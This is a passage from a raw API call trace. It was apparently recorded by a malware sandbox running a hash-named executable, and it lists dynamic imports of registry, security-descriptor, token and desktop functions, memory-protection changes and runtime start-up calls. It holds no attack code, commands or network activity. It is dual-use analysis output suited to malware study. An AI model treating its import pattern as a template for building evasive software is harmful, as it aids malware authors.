returned 0x74591ba0 [0117.499] GetProcAddress (hModule=0x74580000, lpProcName="HeapReAlloc") returned 0x7785efe0 [0117.499] GetProcAddress (hModule=0x74580000, lpProcName="HeapAlloc") returned 0x77862bd0 [0117.499] GetProcAddress (hModule=0x74580000, lpProcName="HeapDestroy") returned 0x745a4c30 [0117.499] GetProcAddress (hModule=0x74580000, lpProcName="SetLastError") returned 0x74592af0 [0117.499] GetProcAddress (hModule=0x74580000, lpProcName="GetLastError") returned 0x74593870 [0117.499] GetProcAddress (hModule=0x74580000, lpProcName="RaiseException") returned 0x74598c20 [0117.499] GetProcAddress (hModule=0x74580000, lpProcName="DecodePointer") returned 0x7788d830 [0117.499] GetProcAddress (hModule=0x74580000, lpProcName="SuspendThread") returned 0x7459ef60 [0117.499] GetProcAddress (hModule=0x74580000, lpProcName="GetCommandLineA") returned 0x7459ab60 [0117.499] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74810000 [0117.500] GetProcAddress (hModule=0x74810000, lpProcName="SetThreadToken") returned 0x74820f50 [0117.500] GetProcAddress (hModule=0x74810000, lpProcName="SetSecurityInfo") returned 0x748305f0 [0117.500] GetProcAddress (hModule=0x74810000, lpProcName="SetKernelObjectSecurity") returned 0x74832d10 [0117.500] GetProcAddress (hModule=0x74810000, lpProcName="SetEntriesInAclW") returned 0x74832bf0 [0117.500] GetProcAddress (hModule=0x74810000, lpProcName="RevertToSelf") returned 0x7482fc20 [0117.501] GetProcAddress (hModule=0x74810000, lpProcName="RegSetValueExW") returned 0x7482f7f0 [0117.501] GetProcAddress (hModule=0x74810000, lpProcName="RegQueryValueExW") returned 0x7482f330 [0117.501] GetProcAddress (hModule=0x74810000, lpProcName="RegOpenKeyExW") returned 0x7482f350 [0117.501] GetProcAddress (hModule=0x74810000, lpProcName="RegDisablePredefinedCache") returned 0x748311d0 [0117.501] GetProcAddress (hModule=0x74810000, lpProcName="ConvertStringSidToSidW") returned 0x7482ddc0 [0117.501] GetProcAddress (hModule=0x74810000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x7482cbe0 [0117.501] GetProcAddress (hModule=0x74810000, lpProcName="ConvertSidToStringSidW") returned 0x7482f060 [0117.501] GetProcAddress (hModule=0x74810000, lpProcName="AccessCheck") returned 0x74831230 [0117.502] GetProcAddress (hModule=0x74810000, lpProcName="RegSetValueExA") returned 0x74830a20 [0117.502] GetProcAddress (hModule=0x74810000, lpProcName="RegOpenKeyExA") returned 0x7482f790 [0117.502] GetProcAddress (hModule=0x74810000, lpProcName="RegEnumKeyExA") returned 0x74831810 [0117.502] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteKeyA") returned 0x748304a0 [0117.502] GetProcAddress (hModule=0x74810000, lpProcName="RegCreateKeyExA") returned 0x7482fa60 [0117.502] GetProcAddress (hModule=0x74810000, lpProcName="RegCloseKey") returned 0x7482f620 [0117.503] GetProcAddress (hModule=0x74810000, lpProcName="SetTokenInformation") returned 0x74833840 [0117.503] GetProcAddress (hModule=0x74810000, lpProcName="SystemFunction036") returned 0x74552a60 [0117.503] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x771b0000 [0117.503] GetProcAddress (hModule=0x771b0000, lpProcName="GetTextExtentPoint32A") returned 0x7725cf10 [0117.503] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x753d0000 [0117.503] GetProcAddress (hModule=0x753d0000, lpProcName="CoAddRefServerProcess") returned 0x75cc0d30 [0117.503] GetProcAddress (hModule=0x753d0000, lpProcName="CoReleaseServerProcess") returned 0x75cc3950 [0117.504] GetProcAddress (hModule=0x753d0000, lpProcName="CoCreateInstance") returned 0x75c70060 [0117.504] GetProcAddress (hModule=0x753d0000, lpProcName="StringFromCLSID") returned 0x75c9dcf0 [0117.504] GetProcAddress (hModule=0x753d0000, lpProcName="CoTaskMemFree") returned 0x75c49170 [0117.504] GetProcAddress (hModule=0x753d0000, lpProcName="CoInitialize") returned 0x75401930 [0117.504] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x74660000 [0117.505] GetProcAddress (hModule=0x74660000, lpProcName=0xa2) returned 0x74685250 [0117.505] GetProcAddress (hModule=0x74660000, lpProcName=0xa1) returned 0x746738b0 [0117.505] GetProcAddress (hModule=0x74660000, lpProcName=0x115) returned 0x74674910 [0117.505] GetProcAddress (hModule=0x74660000, lpProcName=0x7) returned 0x74672640 [0117.505] GetProcAddress (hModule=0x74660000, lpProcName=0x6) returned 0x74679d40 [0117.505] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75db0000 [0117.506] GetProcAddress (hModule=0x75db0000, lpProcName="CommandLineToArgvW") returned 0x75f5bf80 [0117.506] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetFolderPathW") returned 0x75f54e80 [0117.506] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetKnownFolderPath") returned 0x75f59710 [0117.506] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetFileInfoA") returned 0x75f68c50 [0117.506] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75640000 [0117.506] GetProcAddress (hModule=0x75640000, lpProcName="CharNextA") returned 0x7566e240 [0117.506] GetProcAddress (hModule=0x75640000, lpProcName="ShowWindow") returned 0x75678e60 [0117.506] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxA") returned 0x756bfec0 [0117.506] GetProcAddress (hModule=0x75640000, lpProcName="DestroyWindow") returned 0x744e14e0 [0117.506] GetProcAddress (hModule=0x75640000, lpProcName="PostThreadMessageA") returned 0x75674810 [0117.507] GetProcAddress (hModule=0x75640000, lpProcName="GetDlgItem") returned 0x7566cc40 [0117.507] GetProcAddress (hModule=0x75640000, lpProcName="AllowSetForegroundWindow") returned 0x75674b10 [0117.507] GetProcAddress (hModule=0x75640000, lpProcName="ReleaseDC") returned 0x744da580 [0117.507] GetProcAddress (hModule=0x75640000, lpProcName="GetDC") returned 0x744da680 [0117.507] GetProcAddress (hModule=0x75640000, lpProcName="EnableWindow") returned 0x756729d0 [0117.507] GetProcAddress (hModule=0x75640000, lpProcName="IsWindowVisible") returned 0x75675960 [0117.507] GetProcAddress (hModule=0x75640000, lpProcName="SendMessageA") returned 0x7566a220 [0117.507] GetProcAddress (hModule=0x75640000, lpProcName="RegisterClassW") returned 0x75659800 [0117.507] GetProcAddress (hModule=0x75640000, lpProcName="PostMessageW") returned 0x7565d700 [0117.507] GetProcAddress (hModule=0x75640000, lpProcName="IsWindow") returned 0x75658f70 [0117.508] GetProcAddress (hModule=0x75640000, lpProcName="GetWindowThreadProcessId") returned 0x7565da50 [0117.508] GetProcAddress (hModule=0x75640000, lpProcName="GetUserObjectInformationW") returned 0x75678fa0 [0117.508] GetProcAddress (hModule=0x75640000, lpProcName="GetThreadDesktop") returned 0x75679110 [0117.508] GetProcAddress (hModule=0x75640000, lpProcName="GetProcessWindowStation") returned 0x75678b10 [0117.508] GetProcAddress (hModule=0x75640000, lpProcName="GetMessageW") returned 0x75674f60 [0117.508] GetProcAddress (hModule=0x75640000, lpProcName="FindWindowExW") returned 0x75674110 [0117.508] GetProcAddress (hModule=0x75640000, lpProcName="DispatchMessageW") returned 0x756562e0 [0117.508] GetProcAddress (hModule=0x75640000, lpProcName="DefWindowProcW") returned 0x744e07e0 [0117.508] GetProcAddress (hModule=0x75640000, lpProcName="CreateWindowStationW") returned 0x7569c280 [0117.508] GetProcAddress (hModule=0x75640000, lpProcName="CreateWindowExW") returned 0x75659860 [0117.508] GetProcAddress (hModule=0x75640000, lpProcName="CreateDesktopW") returned 0x7569c200 [0117.509] GetProcAddress (hModule=0x75640000, lpProcName="CloseWindowStation") returned 0x75679430 [0117.509] GetProcAddress (hModule=0x75640000, lpProcName="CloseDesktop") returned 0x75679340 [0117.509] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0117.592] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0117.612] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff64 | out: lpSystemTimeAsFileTime=0x19ff64*(dwLowDateTime=0x67dbe877, dwHighDateTime=0x1d86dce)) [0117.612] GetCurrentThreadId () returned 0xd3c [0117.612] GetCurrentProcessId () returned 0x134c [0117.612] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff5c | out: lpPerformanceCount=0x19ff5c*=2223990525292) returned 1 [0117.613] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0117.616] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0117.616] GetProcAddress (hModule=0x77420000, lpProcName="InitializeCriticalSectionEx") returned 0x774dd740 [0117.616] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0117.616] GetProcAddress (hModule=0x77420000, lpProcName="FlsAlloc") returned 0x774e4490 [0117.616] GetProcAddress (hModule=0x77420000, lpProcName="FlsSetValue") returned 0x774dd7a0 [0117.636] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0117.636] GetProcAddress (hModule=0x77420000, lpProcName="InitializeCriticalSectionEx") returned 0x774dd740 [0117.636] GetProcessHeap () returned 0x7c0000 [0117.636] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0117.637] GetProcAddress (hModule=0x77420000, lpProcName="FlsAlloc") returned 0x774e4490 [0117.637] GetLastError () returned 0xcb [0117.637] GetProcAddress (hModule=0x77420000, lpProcName="FlsGetValue") returned 0x774cf350 [0117.637] GetProcAddress (hModule=0x77420000, lpProcName="FlsSetValue") returned 0x774dd7a0 [0117.637] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x364) returned 0x7d9320 [0117.639] SetLastError (dwErrCode=0xcb) [0117.639] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xc00) returned 0x7da7d0 [0117.721] GetStartupInfoW (in: lpStartupInfo=0x19fe98 | out: lpStartupInfo=0x19fe98*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0117.721] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.721] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0117.721] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.721] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe\" " [0117.721] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe\" " [0117.723] GetACP () returned 0x4e4 [0117.723] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x220) returned 0x7d7f18 [0117.723] IsValidCodePage (CodePage=0x4e4) returned 1 [0117.723] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19feb8 | out: lpCPInfo=0x19feb8) returned 1 [0117.723] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f780 | out: lpCPInfo=0x19f780) returned 1 [0117.723] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.723] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f518, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0117.723] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x19f794 | out: lpCharType=0x19f794) returned 1 [0117.729] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.729] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f4c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0117.729] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0117.729] GetProcAddress (hModule=0x77420000, lpProcName="LCMapStringEx") returned 0x774c95f0 [0117.729] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.729] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f2b8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0117.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x19fc94, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿTÕ)¶Ðþ\x19", lpUsedDefaultChar=0x0) returned 256 [0117.729] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.729] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f4e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0117.730] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.730] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x19f2d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0117.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x19fb94, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿTÕ)¶Ðþ\x19", lpUsedDefaultChar=0x0) returned 256 [0117.731] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x80) returned 0x7cf728 [0117.731] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x54c488, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe")) returned 0x62 [0117.731] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x6b) returned 